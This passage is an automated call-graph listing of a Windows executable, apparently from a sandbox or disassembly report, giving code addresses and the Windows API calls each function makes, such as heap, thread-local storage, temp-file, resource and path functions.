7769->7770 7771 40de60 3 API calls 7770->7771 7772 4044a3 PathQuoteSpacesW 7771->7772 8975 40de20 GetLastError TlsGetValue SetLastError 7772->8975 7774 4044b6 7775 40dfc0 3 API calls 7774->7775 7776 4044be 7775->7776 7777 40dfc0 3 API calls 7776->7777 7778 4044c9 7777->7778 7779 40dfc0 3 API calls 7778->7779 7780 4044d3 7779->7780 7781 40de60 3 API calls 7780->7781 7782 4044dd PathQuoteSpacesW 7781->7782 7783 4044f1 7782->7783 7784 404509 7782->7784 9028 405492 CreateThread 7783->9028 9037 402ca9 7784->9037 7788 404512 8976 40de20 GetLastError TlsGetValue SetLastError 7788->8976 7790 404518 8977 40de20 GetLastError TlsGetValue SetLastError 7790->8977 7792 404524 7793 40dfc0 3 API calls 7792->7793 7794 40452c 7793->7794 7795 40dfc0 3 API calls 7794->7795 7796 404537 7795->7796 7797 40dfc0 3 API calls 7796->7797 7849 40df60 21 API calls 7848->7849 7850 40300e 7849->7850 10185 40de20 GetLastError TlsGetValue SetLastError 7850->10185 7852 403014 10186 40de20 GetLastError TlsGetValue SetLastError 7852->10186 7854 40301c 10187 40de20 GetLastError TlsGetValue SetLastError 7854->10187 7856 403024 10188 40de20 GetLastError TlsGetValue SetLastError 7856->10188 7858 40302c 7859 40d0a0 7 API calls 7858->7859 7860 40303e 7859->7860 10189 405182 TlsGetValue 7860->10189 7862 403043 7863 405e50 5 API calls 7862->7863 7864 40304b 7863->7864 7865 40de60 3 API calls 7864->7865 7866 403055 7865->7866 10190 40de20 GetLastError TlsGetValue SetLastError 7866->10190 7868 40305b 10191 40de20 GetLastError TlsGetValue SetLastError 7868->10191 7870 403063 10192 40de20 GetLastError TlsGetValue SetLastError 7870->10192 7872 40306b 10193 40de20 GetLastError TlsGetValue SetLastError 7872->10193 7874 403073 7875 40d0a0 7 API calls 7874->7875 7876 403083 7875->7876 10194 405182 TlsGetValue 7876->10194 7878 403088 7879 405e50 5 API calls 7878->7879 7880 403090 7879->7880 7881 40de60 3 API calls 7880->7881 7882 40309a 7881->7882 7883 402e9d 35 API calls 7882->7883 7884 4030a2 7883->7884 10195 40de20 GetLastError TlsGetValue SetLastError 7884->10195 7886 4030ac 7887 4021a4 118 API calls 7886->7887 7888 4030b7 7887->7888 7889 4051a0 3 API calls 7888->7889 7890 4030bc 7889->7890 10196 40de20 GetLastError TlsGetValue SetLastError 7890->10196 7892 4030c2 10197 40de20 GetLastError TlsGetValue SetLastError 7892->10197 7894 4030ca 7895 4092f5 29 API calls 7894->7895 7896 4030dd 7895->7896 7897 40de60 3 API calls 7896->7897 7898 4030e7 7897->7898 7899 40323e 7898->7899 10198 40de20 GetLastError TlsGetValue SetLastError 7898->10198 7899->7899 7901 4030fe 10199 40de20 GetLastError TlsGetValue SetLastError 7901->10199 7903 403106 10200 40de20 GetLastError TlsGetValue SetLastError 7903->10200 7905 40310e 10201 40de20 GetLastError TlsGetValue SetLastError 7905->10201 7907 403116 7908 40d0a0 7 API calls 7907->7908 7909 403128 7908->7909 10202 405182 TlsGetValue 7909->10202 7911 40312d 7912 405e50 5 API calls 7911->7912 7913 403135 7912->7913 7914 40de60 3 API calls 7913->7914 7915 40313f 7914->7915 10203 40de20 GetLastError TlsGetValue SetLastError 7915->10203 7917 403145 10204 40de20 GetLastError TlsGetValue SetLastError 7917->10204 7919 40314d 10205 40de20 GetLastError TlsGetValue SetLastError 7919->10205 7921 403155 10206 40de20 GetLastError TlsGetValue SetLastError 7921->10206 7923 40315d 7924 40d0a0 7 API calls 7923->7924 7925 40316f 7924->7925 10207 405182 TlsGetValue 7925->10207 7927 403174 7928 405e50 5 API calls 7927->7928 7929 40317c 7928->7929 7930 40de60 3 API calls 7929->7930 7931 403186 7930->7931 10208 40de20 GetLastError TlsGetValue SetLastError 7931->10208 7933 40318c 7934 403cd7 82 API calls 7933->7934 7935 40319c 7934->7935 7936 40de60 3 API calls 7935->7936 7937 4031a8 7936->7937 10209 40de20 GetLastError TlsGetValue SetLastError 7937->10209 7939 4031ae 7940 403cd7 82 API calls 7939->7940 7941 4031be 7940->7941 7942 40de60 3 API calls 7941->7942 7943 4031c8 PathAddBackslashW 7942->7943 10210 40de20 GetLastError TlsGetValue SetLastError 7943->10210 7945 4031d7 10211 40de20 GetLastError TlsGetValue SetLastError 7945->10211 7947 4031e7 7948 40dfc0 3 API calls 7947->7948 7949 4031ef 7948->7949 7950 40dfc0 3 API calls 7949->7950 7951 4031fb 7950->7951 10212 405182 TlsGetValue 7951->10212 7953 403200 7954 40240c 33 API calls 7953->7954 7955 403208 7954->7955 7956 4051a0 3 API calls 7955->7956 7957 40320d 7956->7957 10213 40de20 GetLastError TlsGetValue SetLastError 7957->10213 7959 403217 7960 40dfc0 3 API calls 7959->7960 7961 40321f 7960->7961 7962 40de60 3 API calls 7961->7962 7963 40322b PathRemoveBackslashW 7962->7963 7964 402ca9 135 API calls 7963->7964 7964->7899 7965->7434 7966->7437 7968 40d302 7967->7968 7969 40d340 TlsGetValue RtlReAllocateHeap TlsSetValue 7968->7969 7970 40d318 TlsAlloc RtlAllocateHeap TlsSetValue 7968->7970 7971 40d37c 7969->7971 7970->7969 7973 409614 7971->7973 7975 40db12 RtlAllocateHeap 7971->7975 7974 40d4cc RtlAllocateHeap RtlAllocateHeap RtlInitializeCriticalSection 7973->7974 7974->7443 7976 40db2a 7975->7976 7976->7973 7978 40e0e1 wcslen 7977->7978 7979 40e14d 7977->7979 7980 40e116 RtlReAllocateHeap 7978->7980 7981 40e0f8 RtlAllocateHeap 7978->7981 7982 40e155 HeapFree 7979->7982 7983 40e138 7979->7983 7980->7983 7981->7983 7982->7983 7983->7449 7985 409d8f RtlAllocateHeap 7984->7985 7986 409e78 7984->7986 7985->7453 7985->7456 8010 40a0ba 7986->8010 7988 409e80 8017 40d8e6 7988->8017 7991 409ec3 HeapFree 7991->7985 7992 409eaf 7993 409eb0 HeapFree 7992->7993 7993->7993 7994 409ec2 7993->7994 7994->7991 7996 40d7da 7995->7996 7997 40d892 RtlAllocateHeap 7996->7997 7998 40d7e6 7996->7998 8000 409e16 RtlAllocateHeap 7997->8000 8003 40d8a7 7997->8003 8054 40d9e3 LoadLibraryW 7998->8054 8000->7456 8002 40d8d0 RtlInitializeCriticalSection 8002->8000 8003->8000 8003->8002 8004 40d827 RtlAllocateHeap 8006 40d885 RtlLeaveCriticalSection 8004->8006 8007 40d83d 8004->8007 8005 40d80b 8005->8004 8005->8006 8006->8000 8008 40d7b9 6 API calls 8007->8008 8009 40d854 8008->8009 8009->8006 8013 40a0ce 8010->8013 8011 40a117 memset 8014 40a130 8011->8014 8012 40a0d9 HeapFree 8012->8013 8013->8011 8013->8012 8030 411a6a 8013->8030 8035 40d6eb 8013->8035 8014->7988 8018 40d8f3 RtlEnterCriticalSection 8017->8018 8019 40d958 8017->8019 8021 40d94e RtlLeaveCriticalSection 8018->8021 8022 40d90f 8018->8022 8045 40d67d 8019->8045 8023 409e88 HeapFree HeapFree 8021->8023 8025 40d8e6 4 API calls 8022->8025 8023->7991 8023->7992 8028 40d919 HeapFree 8025->8028 8026 40d964 RtlDeleteCriticalSection 8027 40d96e HeapFree 8026->8027 8027->8023 8028->8021 8031 411b65 8030->8031 8032 411a82 8030->8032 8031->8013 8032->8031 8033 411a6a HeapFree 8032->8033 8042 40def0 8032->8042 8033->8032 8036 40d6f8 RtlEnterCriticalSection 8035->8036 8040 40d702 8035->8040 8036->8040 8037 40d7b4 8037->8013 8038 40d7aa RtlLeaveCriticalSection 8038->8037 8039 40d76b 8039->8037 8039->8038 8040->8039 8041 40d755 HeapFree 8040->8041 8041->8039 8043 40defb HeapFree 8042->8043 8044 40df0e 8042->8044 8043->8044 8044->8032 8046 40d695 8045->8046 8047 40d68b RtlEnterCriticalSection 8045->8047 8048 40d6b2 8046->8048 8049 40d69c HeapFree 8046->8049 8047->8046 8050 40d6b8 HeapFree 8048->8050 8051 40d6ce 8048->8051 8049->8048 8049->8049 8050->8050 8050->8051 8052 40d6e5 8051->8052 8053 40d6db RtlLeaveCriticalSection 8051->8053 8052->8026 8052->8027 8053->8052 8055 40da00 GetProcAddress 8054->8055 8056 40da2b InterlockedCompareExchange 8054->8056 8059 40da20 FreeLibrary 8055->8059 8060 40da10 8055->8060 8057 40da3b 8056->8057 8058 40da4f InterlockedExchange 8056->8058 8061 40d7f5 RtlEnterCriticalSection 8057->8061 8063 40da40 Sleep 8057->8063 8058->8061 8059->8056 8059->8061 8060->8059 8061->8005 8063->8057 8065 40a466 8064->8065 8069 40a447 8064->8069 8066 40a38b 8065->8066 8067 40d6eb 3 API calls 8065->8067 8066->7465 8067->8065 8068 411a6a HeapFree 8068->8069 8069->8066 8069->8068 8070 40d6eb 3 API calls 8069->8070 8070->8069 8072 40db7b 8071->8072 8076 40dcc6 8071->8076 8072->7479 8072->7481 8073 40dcf1 HeapFree 8073->8072 8074 40dcef 8074->8073 8075 411a6a HeapFree 8075->8076 8076->8073 8076->8074 8076->8075 8078 40df8a TlsGetValue 8077->8078 8079 40df6c 8077->8079 8081 402f4d 8078->8081 8082 40df9b 8078->8082 8080 40ddd0 5 API calls 8079->8080 8084 40df71 TlsGetValue 8080->8084 8088 4051a0 8081->8088 8120 40e600 RtlAllocateHeap RtlAllocateHeap TlsSetValue 8082->8120 8111 411d62 8084->8111 8085 40dfa0 TlsGetValue 8087 411d62 13 API calls 8085->8087 8087->8081 8121 40e6e0 GetLastError TlsGetValue SetLastError 8088->8121 8090 4051ab 8090->7493 8091->7495 8092->7497 8093->7499 8094->7501 8097 40d0cd 8095->8097 8122 40d1c0 8097->8122 8099 405182 TlsGetValue 8099->7505 8101 405e5d 8100->8101 8130 40e180 TlsGetValue 8101->8130 8104 40e200 2 API calls 8105 405e71 8104->8105 8106 405e7d 8105->8106 8132 40e2d0 TlsGetValue 8105->8132 8108 405ead 8106->8108 8109 405ea0 CharUpperW 8106->8109 8108->7507 8109->7507 8110->7509 8112 411d72 TlsAlloc RtlInitializeCriticalSection 8111->8112 8113 411d8e TlsGetValue 8111->8113 8112->8113 8114 411da4 RtlAllocateHeap 8113->8114 8115 411e2b RtlAllocateHeap 8113->8115 8116 411e3f 8114->8116 8117 411dbe RtlEnterCriticalSection 8114->8117 8115->8116 8116->8081 8118 411dd0 7 API calls 8117->8118 8119 411dce 8117->8119 8118->8115 8119->8118 8120->8085 8121->8090 8123 40d1cc 8122->8123 8126 40e200 TlsGetValue 8123->8126 8127 40e21b 8126->8127 8128 40e241 RtlReAllocateHeap 8127->8128 8129 402fd9 8127->8129 8128->8129 8129->8099 8131 405e65 8130->8131 8131->8104 8132->8106 8133->7518 8134->7520 8135->7522 8137 40e200 2 API calls 8136->8137 8138 40964a GetModuleFileNameW wcscmp 8137->8138 8139 409685 8138->8139 8140 40966d memmove 8138->8140 8206 40e350 TlsGetValue 8139->8206 8140->8139 8142 401bc5 8143 405182 TlsGetValue 8142->8143 8143->7526 8144->7534 8145->7536 8146->7538 8147->7540 8148->7543 8149->7547 8151 405dbd 8150->8151 8152 40e180 TlsGetValue 8151->8152 8153 405de0 8152->8153 8154 40e200 2 API calls 8153->8154 8155 405dec 8154->8155 8156 401ce9 8155->8156 8207 40e2d0 TlsGetValue 8155->8207 8158 405182 TlsGetValue 8156->8158 8158->7552 8208 40d020 8159->8208 8162 405182 TlsGetValue 8162->7556 8163->7562 8165 40dfe2 8164->8165 8166 40dfd3 wcslen 8164->8166 8167 40e200 2 API calls 8165->8167 8166->8165 8168 40dfed 8167->8168 8168->7564 8169->7568 8170->7570 8171->7572 8172->7574 8173->7578 8174->7584 8175->7586 8177 405ece 8176->8177 8178 40e180 TlsGetValue 8177->8178 8179 405eea 8178->8179 8180 40e200 2 API calls 8179->8180 8181 405ef6 8180->8181 8183 405f02 8181->8183 8224 40e2d0 TlsGetValue 8181->8224 8183->7588 8225 40d288 TlsGetValue 8184->8225 8189 40de20 GetLastError TlsGetValue SetLastError 8189->7595 8190->7599 8192 40d288 16 API calls 8191->8192 8193 409825 8192->8193 8194 4096da 17 API calls 8193->8194 8195 409838 8194->8195 8196 40e200 2 API calls 8195->8196 8197 409846 8196->8197 8234 40e350 TlsGetValue 8197->8234 8199 401dc9 8200 40e020 TlsGetValue 8199->8200 8200->7607 8235 40e6a0 TlsGetValue 8201->8235 8203 40516a 8203->7613 8204->7615 8205->7617 8206->8142 8207->8156 8209 40d032 8208->8209 8210 40d07d 8209->8210 8213 40d052 8209->8213 8211 40d1c0 2 API calls 8210->8211 8212 401cf6 8211->8212 8212->8162 8217 411e80 8213->8217 8215 40d058 8223 411e70 ??3@YAXPAX 8215->8223 8218 411ef4 malloc 8217->8218 8219 411e8c WideCharToMultiByte 8217->8219 8218->8215 8219->8218 8221 411ec0 malloc 8219->8221 8221->8218 8222 411ed2 WideCharToMultiByte 8221->8222 8222->8215 8223->8210 8224->8183 8226 40d29b RtlAllocateHeap TlsSetValue 8225->8226 8229 409809 8225->8229 8227 40d2c7 8226->8227 8228 411d62 13 API calls 8227->8228 8228->8229 8230 4096da 8229->8230 8231 40d288 16 API calls 8230->8231 8232 4096eb GetCommandLineW 8231->8232 8233 401dab 8232->8233 8233->7593 8233->8189 8234->8199 8235->8203 8237 40e200 2 API calls 8236->8237 8238 405d6b 8237->8238 8238->7663 8239->7649 8240->7674 8242 40327b 8241->8242 8242->8242 8243 40df60 21 API calls 8242->8243 8244 40328d 8243->8244 8245 4051a0 3 API calls 8244->8245 8246 403296 8245->8246 9102 405060 8246->9102 8249 405060 2 API calls 8250 4032af 8249->8250 9105 402bc1 8250->9105 8253 4032b8 9112 40559a GetVersionExW 8253->9112 8254 4032cb 8257 4032d5 8254->8257 8258 40343b 8254->8258 9118 40de20 GetLastError TlsGetValue SetLastError 8257->9118 9150 40de20 GetLastError TlsGetValue SetLastError 8258->9150 8261 403441 9151 40de20 GetLastError TlsGetValue SetLastError 8261->9151 8262 4032db 9119 40de20 GetLastError TlsGetValue SetLastError 8262->9119 8265 403449 8267 406260 2 API calls 8265->8267 8266 4032e3 9120 406260 8266->9120 8269 403455 8267->8269 8272 40de60 3 API calls 8269->8272 8271 40de60 3 API calls 8273 4032f9 GetWindowsDirectoryW PathAddBackslashW 8271->8273 8274 40345f GetSystemDirectoryW PathAddBackslashW 8272->8274 9123 40de20 GetLastError TlsGetValue SetLastError 8273->9123 8325 403439 8274->8325 8276 40331a 8278 40dfc0 3 API calls 8276->8278 8281 403322 8278->8281 8279 403480 8280 40dfc0 3 API calls 8279->8280 8282 403488 8280->8282 8283 40dfc0 3 API calls 8281->8283 9111 405170 TlsGetValue 8282->9111 8285 40332d 8283->8285 8287 40de60 3 API calls 8285->8287 8286 40348f 8290 40def0 HeapFree 8286->8290 8288 403337 PathAddBackslashW 8287->8288 9124 40de20 GetLastError TlsGetValue SetLastError 8288->9124 8292 4034a7 8290->8292 8291 40334a 8293 40dfc0 3 API calls 8291->8293 8294 40def0 HeapFree 8292->8294 8295 403352 8293->8295 8296 4034af 8294->8296 8297 40dfc0 3 API calls 8295->8297 8298 40def0 HeapFree 8296->8298 8300 40335c 8297->8300 8299 4034b8 8298->8299 8302 40def0 HeapFree 8299->8302 8301 40de60 3 API calls 8300->8301 8303 403366 8301->8303 8304 4034c1 8302->8304 9125 40de20 GetLastError TlsGetValue SetLastError 8303->9125 8306 40def0 HeapFree 8304->8306 8308 4034ca 8306->8308 8307 403370 8309 40dfc0 3 API calls 8307->8309 8308->7681 8310 403378 8309->8310 8311 40dfc0 3 API calls 8310->8311 8312 403382 8311->8312 8313 40dfc0 3 API calls 8312->8313 8314 40338c 8313->8314 8315 40de60 3 API calls 8314->8315 8316 403396 8315->8316 9126 40ad60 8316->9126 8318 4033a4 8319 4033ba 8318->8319 9136 40a970 8318->9136 8321 40ad60 10 API calls 8319->8321 8322 4033d2 8321->8322 8323 4033e8 8322->8323 8324 40a970 10 API calls 8322->8324 8323->8325 9148 40de20 GetLastError TlsGetValue SetLastError 8323->9148 8324->8323 9110 40de20 GetLastError TlsGetValue SetLastError 8325->9110 8327 403404 9149 40de20 GetLastError TlsGetValue SetLastError 8327->9149 8329 40340c 8330 406260 2 API calls 8329->8330 8331 403418 8330->8331 8332 40de60 3 API calls 8331->8332 8333 403422 GetSystemDirectoryW PathAddBackslashW 8332->8333 8333->8325 8334->7687 8335->7689 8336->7691 8337->7693 8338->7697 8339->7703 8340->7705 8341->7707 8342->7709 8343->7713 8345 40df60 21 API calls 8344->8345 8346 402eaa 8345->8346 8347 405060 2 API calls 8346->8347 8348 402eb6 FindResourceW 8347->8348 8349 402ed5 8348->8349 8356 402ef1 8348->8356 9197 4026b8 8349->9197 8353 402f00 9193 40e720 8353->9193 9190 409b40 8356->9190 8357 402f24 8358 40def0 HeapFree 8357->8358 8359 402f3b 8358->8359 8360 40de20 GetLastError TlsGetValue SetLastError 8359->8360 8360->7721 8362 40df60 21 API calls 8361->8362 8363 4021b0 8362->8363 8364 4051a0 3 API calls 8363->8364 8365 4021b9 8364->8365 8366 4021d2 8365->8366 8367 4023ba 8365->8367 9229 40de20 GetLastError TlsGetValue SetLastError 8366->9229 9227 40de20 GetLastError TlsGetValue SetLastError 8367->9227 8370 4021d8 9230 40de20 GetLastError TlsGetValue SetLastError 8370->9230 8371 4023c4 8373 40dfc0 3 API calls 8371->8373 8375 4023cc 8373->8375 8374 4021e0 9231 40de20 GetLastError TlsGetValue SetLastError 8374->9231 9228 405170 TlsGetValue 8375->9228 8378 4021e8 9232 40de20 GetLastError TlsGetValue SetLastError 8378->9232 8379 4023d3 8382 40def0 HeapFree 8379->8382 8381 4021f0 9233 409bb0 8381->9233 8384 4023eb 8382->8384 8385 40def0 HeapFree 8384->8385 8387 4023f4 8385->8387 8386 402204 9242 405182 TlsGetValue 8386->9242 8389 40def0 HeapFree 8387->8389 8391 4023fc 8389->8391 8390 402209 9243 406000 8390->9243 8393 40def0 HeapFree 8391->8393 8396 402405 8393->8396 8395 40de60 3 API calls 8397 40221b 8395->8397 8396->7724 9246 40de20 GetLastError TlsGetValue SetLastError 8397->9246 8399 402221 9247 40de20 GetLastError TlsGetValue SetLastError 8399->9247 8401 402229 9248 40de20 GetLastError TlsGetValue SetLastError 8401->9248 8403 402231 9249 40de20 GetLastError TlsGetValue SetLastError 8403->9249 8405 402239 8406 409bb0 4 API calls 8405->8406 8407 402250 8406->8407 9250 405182 TlsGetValue 8407->9250 8409 402255 8410 406000 4 API calls 8409->8410 8411 40225d 8410->8411 8412 40de60 3 API calls 8411->8412 8413 402267 8412->8413 9251 40de20 GetLastError TlsGetValue SetLastError 8413->9251 8415 40226d 9252 40de20 GetLastError TlsGetValue SetLastError 8415->9252 8417 402275 9253 40de20 GetLastError TlsGetValue SetLastError 8417->9253 8419 402288 9254 40de20 GetLastError TlsGetValue SetLastError 8419->9254 8421 402290 9255 4057f0 8421->9255 8423 4022a6 9271 40e020 TlsGetValue 8423->9271 8425 4022ab 9272 40de20 GetLastError TlsGetValue SetLastError 8425->9272 8427 4022b1 9273 40de20 GetLastError TlsGetValue SetLastError 8427->9273 8429 4022b9 8430 4057f0 8 API calls 8429->8430 8431 4022cf 8430->8431 9274 405182 TlsGetValue 8431->9274 8433 4022d4 9275 405182 TlsGetValue 8433->9275 8435 4022dc 9276 408f09 8435->9276 8438 40de60 3 API calls 8439 4022ef 8438->8439 8440 4023b0 8439->8440 8441 402300 8439->8441 8442 401fa9 35 API calls 8440->8442 9319 40de20 GetLastError TlsGetValue SetLastError 8441->9319 8442->8367 8444 402306 9320 40de20 GetLastError TlsGetValue SetLastError 8444->9320 8446 40230e 9321 40de20 GetLastError TlsGetValue SetLastError 8446->9321 8448 40231b 9322 40de20 GetLastError TlsGetValue SetLastError 8448->9322 8450 402323 8451 406000 4 API calls 8450->8451 8452 40232e 8451->8452 9323 405182 TlsGetValue 8452->9323 8454 402333 8455 40d0a0 7 API calls 8454->8455 8456 40233b 8455->8456 8457 40de60 3 API calls 8456->8457 8458 402345 8457->8458 8459 4023ae 8458->8459 9324 40de20 GetLastError TlsGetValue SetLastError 8458->9324 8459->8367 8461 40235b 9325 40de20 GetLastError TlsGetValue SetLastError 8461->9325 8463 402368 9326 40de20 GetLastError TlsGetValue SetLastError 8463->9326 8465 402370 8466 4057f0 8 API calls 8465->8466 8467 402386 8466->8467 9327 40e020 TlsGetValue 8467->9327 8469 40238b 9328 405182 TlsGetValue 8469->9328 8471 402396 9329 408dc7 8471->9329 8474 4051a0 3 API calls 8475 4023a4 8474->8475 8476 401fa9 35 API calls 8475->8476 8476->8459 8478 40df60 21 API calls 8477->8478 8499 401969 8478->8499 8479 4019ea 8481 409b40 RtlAllocateHeap 8479->8481 8480 40de20 GetLastError TlsGetValue SetLastError 8480->8499 8482 4019f4 8481->8482 9385 40de20 GetLastError TlsGetValue SetLastError 8482->9385 8484 4019fe 9386 40de20 GetLastError TlsGetValue SetLastError 8484->9386 8485 405d60 2 API calls 8485->8499 8487 401a06 9387 40a6f6 8487->9387 8490 40de60 3 API calls 8491 401a17 GetTempFileNameW 8490->8491 9396 40de20 GetLastError TlsGetValue SetLastError 8491->9396 8493 401a35 9397 40de20 GetLastError TlsGetValue SetLastError 8493->9397 8494 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 8494->8499 8496 401a3d 8498 409b60 3 API calls 8496->8498 8497 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8497->8499 8500 401a48 8498->8500 8499->8479 8499->8480 8499->8485 8499->8494 8499->8497 8501 40de60 3 API calls 8500->8501 8502 401a54 8501->8502 9398 40a787 8502->9398 8508 401a8a 9407 40de20 GetLastError TlsGetValue SetLastError 8508->9407 8510 401a92 8511 409b60 3 API calls 8510->8511 8512 401a9d 8511->8512 8513 40de60 3 API calls 8512->8513 8514 401aa9 8513->8514 8515 40a787 2 API calls 8514->8515 8516 401ab4 8515->8516 8517 40a665 3 API calls 8516->8517 8518 401abf GetTempFileNameW PathAddBackslashW 8517->8518 9408 40de20 GetLastError TlsGetValue SetLastError 8518->9408 8520 401aea 9409 40de20 GetLastError TlsGetValue SetLastError 8520->9409 8522 401af2 8523 409b60 3 API calls 8522->8523 8524 401afd 8523->8524 8525 40de60 3 API calls 8524->8525 8526 401b09 8525->8526 8527 40a787 2 API calls 8526->8527 8528 401b14 PathRenameExtensionW GetTempFileNameW 8527->8528 9410 40de20 GetLastError TlsGetValue SetLastError 8528->9410 8530 401b43 9411 40de20 GetLastError TlsGetValue SetLastError 8530->9411 8532 401b4b 8533 409b60 3 API calls 8532->8533 8534 401b56 8533->8534 8535 40de60 3 API calls 8534->8535 8536 401b62 8535->8536 9412 409b20 HeapFree 8536->9412 8538 401b6b 8539 40def0 HeapFree 8538->8539 8540 401b78 8539->8540 8541 40def0 HeapFree 8540->8541 8542 401b81 8541->8542 8543 40def0 HeapFree 8542->8543 8544 401b8a 8543->8544 8545 40460e 8544->8545 8546 40df60 21 API calls 8545->8546 8560 40461b 8546->8560 8547 40469c 9419 40de20 GetLastError TlsGetValue SetLastError 8547->9419 8548 40de20 GetLastError TlsGetValue SetLastError 8548->8560 8550 4046a2 8552 40358d 92 API calls 8550->8552 8551 405d60 2 API calls 8551->8560 8553 4046b8 8552->8553 8555 40de60 3 API calls 8553->8555 8554 40de60 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8554->8560 8556 4046c2 8555->8556 9420 40a8fa 8556->9420 8559 40def0 HeapFree 8561 4046d6 8559->8561 8560->8547 8560->8548 8560->8551 8560->8554 8562 40dfc0 wcslen TlsGetValue RtlReAllocateHeap 8560->8562 8563 40def0 HeapFree 8561->8563 8562->8560 8564 4046df 8563->8564 8565 40def0 HeapFree 8564->8565 8566 4043c2 8565->8566 8567 40de20 GetLastError TlsGetValue SetLastError 8566->8567 8567->7731 8569 40df60 21 API calls 8568->8569 8570 403597 8569->8570 8571 4051a0 3 API calls 8570->8571 8572 4035a0 8571->8572 8573 405060 2 API calls 8572->8573 8574 4035ac 8573->8574 8575 4035b7 8574->8575 8576 4035db 8574->8576 9425 40de20 GetLastError TlsGetValue SetLastError 8575->9425 8578 4035e5 8576->8578 8579 403608 8576->8579 9427 40de20 GetLastError TlsGetValue SetLastError 8578->9427 8581 403612 8579->8581 8582 40363b 8579->8582 8580 4035bd 9426 40de20 GetLastError TlsGetValue SetLastError 8580->9426 9428 40de20 GetLastError TlsGetValue SetLastError 8581->9428 8584 403645 8582->8584 8585 40366e 8582->8585 9446 40de20 GetLastError TlsGetValue SetLastError 8584->9446 8593 4036a1 8585->8593 8594 403678 8585->8594 8586 4035f1 8590 40dfc0 3 API calls 8586->8590 8596 4035f9 8590->8596 8591 4035c5 8599 40a795 4 API calls 8591->8599 8592 403618 9429 40de20 GetLastError TlsGetValue SetLastError 8592->9429 8597 4036d4 8593->8597 8598 4036ab 8593->8598 9448 40de20 GetLastError TlsGetValue SetLastError 8594->9448 8595 40364b 9447 40de20 GetLastError TlsGetValue SetLastError 8595->9447 8603 40de60 3 API calls 8596->8603 8608 403707 8597->8608 8609 4036de 8597->8609 9450 40de20 GetLastError TlsGetValue SetLastError 8598->9450 8605 4035cc 8599->8605 8611 4035d6 8603->8611 8615 40de60 3 API calls 8605->8615 8606 403620 9430 40a7da 8606->9430 8607 40367e 9449 40de20 GetLastError TlsGetValue SetLastError 8607->9449 8613 403711 8608->8613 8614 40373a 8608->8614 9452 40de20 GetLastError TlsGetValue SetLastError 8609->9452 8610 403653 8622 40a7da 14 API calls 8610->8622 9423 40de20 GetLastError TlsGetValue SetLastError 8611->9423 8612 4036b1 9451 40de20 GetLastError TlsGetValue SetLastError 8612->9451 9454 40de20 GetLastError TlsGetValue SetLastError 8613->9454 8620 403744 8614->8620 8621 40376d 8614->8621 8615->8611 8619 4036e4 9453 40de20 GetLastError TlsGetValue SetLastError 8619->9453 9456 40de20 GetLastError TlsGetValue SetLastError 8620->9456 8633 403777 8621->8633 8634 40379d 8621->8634 8630 40365f 8622->8630 8626 403686 8636 40a7da 14 API calls 8626->8636 8643 40de60 3 API calls 8630->8643 8631 4036b9 8644 40a7da 14 API calls 8631->8644 8632 403717 9455 40de20 GetLastError TlsGetValue SetLastError 8632->9455 9458 40de20 GetLastError TlsGetValue SetLastError 8633->9458 8641 4037f5 8634->8641 8642 4037a7 8634->8642 8635 40de60 3 API calls 8695 403636 8635->8695 8637 403692 8636->8637 8647 40de60 3 API calls 8637->8647 8638 40381f 8648 40dfc0 3 API calls 8638->8648 8639 4036ec 8649 40a7da 14 API calls 8639->8649 8640 40374a 9457 40de20 GetLastError TlsGetValue SetLastError 8640->9457 9488 40de20 GetLastError TlsGetValue SetLastError 8641->9488 9460 40de20 GetLastError TlsGetValue SetLastError 8642->9460 8643->8695 8653 4036c5 8644->8653 8647->8695 8656 403827 8648->8656 8657 4036f8 8649->8657 8661 40de60 3 API calls 8653->8661 8654 40371f 8662 40a7da 14 API calls 8654->8662 8655 40377d 9459 40de20 GetLastError TlsGetValue SetLastError 8655->9459 9424 405170 TlsGetValue 8656->9424 8666 40de60 3 API calls 8657->8666 8658 403752 8667 40a7da 14 API calls 8658->8667 8659 4037ad 9461 40de20 GetLastError TlsGetValue SetLastError 8659->9461 8660 4037fb 9489 40de20 GetLastError TlsGetValue SetLastError 8660->9489 8661->8695 8670 40372b 8662->8670 8664 403785 8671 40a7da 14 API calls 8664->8671 8666->8695 8673 40375e 8667->8673 8676 40de60 3 API calls 8670->8676 8677 403791 8671->8677 8672 40382e 8684 40def0 HeapFree 8672->8684 8678 40de60 3 API calls 8673->8678 8674 4037b5 9462 4092f5 8674->9462 8675 403803 8680 40a795 4 API calls 8675->8680 8676->8695 8681 40de60 3 API calls 8677->8681 8678->8695 8683 40380a 8680->8683 8681->8695 8687 40de60 3 API calls 8683->8687 8685 403846 8684->8685 8688 40def0 HeapFree 8685->8688 8686 40de60 3 API calls 8689 4037d0 8686->8689 8687->8611 8690 40384e 8688->8690 8691 4037e9 8689->8691 8692 4037dd 8689->8692 8690->7734 8694 401fa9 35 API calls 8691->8694 9485 405532 8692->9485 8694->8695 8695->8611 8696->7738 8697->7740 8699 40df60 21 API calls 8698->8699 8700 402c04 8699->8700 8701 4051a0 3 API calls 8700->8701 8702 402c0d 8701->8702 8703 405060 2 API calls 8702->8703 8704 402c19 8703->8704 8705 409b40 RtlAllocateHeap 8704->8705 8706 402c23 GetShortPathNameW 8705->8706 9496 40de20 GetLastError TlsGetValue SetLastError 8706->9496 8708 402c3f 9497 40de20 GetLastError TlsGetValue SetLastError 8708->9497 8710 402c47 8711 409bb0 4 API calls 8710->8711 8712 402c57 8711->8712 8713 40de60 3 API calls 8712->8713 8714 402c61 8713->8714 9498 409b20 HeapFree 8714->9498 8716 402c6a 9499 40de20 GetLastError TlsGetValue SetLastError 8716->9499 8718 402c74 8719 40dfc0 3 API calls 8718->8719 8720 402c7c 8719->8720 9500 405170 TlsGetValue 8720->9500 8722 402c83 8723 40def0 HeapFree 8722->8723 8724 402c9a 8723->8724 8725 40def0 HeapFree 8724->8725 8726 402ca3 8725->8726 8727 40e020 TlsGetValue 8726->8727 8727->7744 8728->7746 8730 409867 SetEnvironmentVariableW 8729->8730 8731 404434 8729->8731 8730->8731 8731->7749 8733->7752 8734->7760 8736 40df60 21 API calls 8735->8736 8737 401e5f 8736->8737 8738 4051a0 3 API calls 8737->8738 8739 401e68 8738->8739 9501 40de20 GetLastError TlsGetValue SetLastError 8739->9501 8741 401e6e 9502 40de20 GetLastError TlsGetValue SetLastError 8741->9502 8743 401e76 8744 409638 6 API calls 8743->8744 8745 401e7d 8744->8745 8746 40de60 3 API calls 8745->8746 8747 401e87 PathQuoteSpacesW 8746->8747 8748 401ee0 8747->8748 8749 